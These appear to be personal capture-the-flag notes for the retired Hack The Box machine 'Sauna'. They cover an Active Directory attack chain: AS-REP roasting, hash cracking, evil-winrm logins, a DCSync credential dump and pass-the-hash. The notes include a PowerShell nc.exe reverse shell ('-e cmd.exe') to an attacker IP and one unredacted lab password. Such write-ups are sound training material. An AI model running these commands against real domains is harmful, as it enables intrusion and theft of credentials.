Sauna

Windows - Easy - Retired

- ASREPRoast Names: Fergus Smith Shaun Coins Hugo Bear Bowie Taylor Sophie Driver Steven Kerb Jenny Joy James Doe

kerbrute userenum --dc sauna.htb -d EGOTISTICALBANK --safe -v usernames [+] VALID USERNAME: fsmith@EGOTISTICALBANK

- AS-REP Hash impacket-GetNPUsers -dc-ip sauna.htb -format hashcat -usersfile kerbuser -outputfile fsmith.asreproast EGOTISTICALBANK/

hashcat -a 0 -m 18200 --force fsmith.asreproast /usr/share/wordlists/rockyou.txt

Password = [redacted]

- WINRMI [5986] evil-winrm -u 'fsmith' -p 'Thestrokes23' -i sauna.htb

$env:COMPUTERNAME

→ Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : [redacted]

Note: This powershell script doesn't work. [Maybe try again sometime]

 $user='svc_loanmanager'
 $password='[redacted]'
 $securePassword= ConvertTo-SecureString $password -AsPlainText -Force
 $credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
 Start-Process -FilePath 'nc.exe' -ArgumentList '-e cmd.exe 10.10.14.30 7908' -Credential $credential

evil-winrm -u 'svc_loanmgr' -p '[redacted]' -i sauna.htb

bloodhound-python -u svc_loanmgr -p [redacted[ -d EGOTISTICALBANK.LOCAL -ns 10.10.10.175 -c All

- DCSync Attack

Some very privileged rights are required to execute a DCSync attack. Since it typically takes some time for an attacker to obtain these permissions, this attack is classified as a late-stage kill chain attack.

Generally, Administrators, Domain Admins and Enterprise Admins have the rights required to execute a DCSync attack. Specifically, the following rights are required: * Replicating Directory Changes * Replicating Directory Changes All

impacket-secretsdump 'EGOTISTICALBANK/svc_loanmgr:[redacted]@10.10.10.175'

- Cracking Administrator password hashcat -a 0 '[redacted]' /usr/share/wordlists/rockyou.txt

- Using WINRM for shell evil-winrm -u 'administrator' -H '' -i 10.10.10.175